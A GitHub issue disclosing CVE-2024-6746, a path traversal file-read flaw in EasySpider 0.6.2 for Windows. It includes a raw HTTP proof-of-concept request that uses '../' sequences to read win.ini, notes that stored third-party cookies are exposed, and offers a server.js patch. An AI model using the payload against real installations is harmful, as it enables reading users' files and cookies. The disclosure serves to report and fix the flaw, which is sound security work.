Hebing123 / cve


EasySpider Version 0.6.2 Windows LFI #60

Open Hebing123 opened 4 months ago

Hebing123 commented 4 months ago


Summary

EasySpider Version 0.6.2 for Windows has an arbitrary file read vulnerability. An attacker can read any file on the disk where the EasySpider application is located without access control restrictions. This vulnerability may lead to sensitive information leakage, system crashes, and other issues.


Details

  1. By inputting an incorrect path, you can determine the absolute path of the EasySpider running directory.
  2. If the running directory is under the C drive (users usually run it from the desktop, e.g., C:/Users/%USER%/Desktop/), it will affect system security. For example, you can read C:/Windows/win.ini using a Proof of Concept (POC). Additionally, attackers can not only read system files but also access user information stored in the EasySpider\user_data directory, including cookies from third-party sites.

POC

GET /../../../../../../../../../Windows/win.ini HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: localhost:8074


Patch

Modify the code in \EasySpider\resources\app\server.js to ensure that the provided path does not contain any unsafe path traversal sequences.

const path = require('path');
const SAFE_BASE_DIR = path.resolve(__dirname, 'src');
···
      // join() normalises ".." segments, so a traversal resolves to a path outside SAFE_BASE_DIR
      const safePath = path.join(SAFE_BASE_DIR, pathName);

      // Compare against the base plus a separator: a bare startsWith() would also
      // accept a sibling directory such as "srcfoo", which begins with ".../src".
      if (safePath !== SAFE_BASE_DIR && !safePath.startsWith(SAFE_BASE_DIR + path.sep)) {
        res.writeHead(400, {"Content-Type": "text/plain"});
        res.end("Invalid request path");
        return;
      }

Hebing123 commented 4 months ago

CVE-2024-6746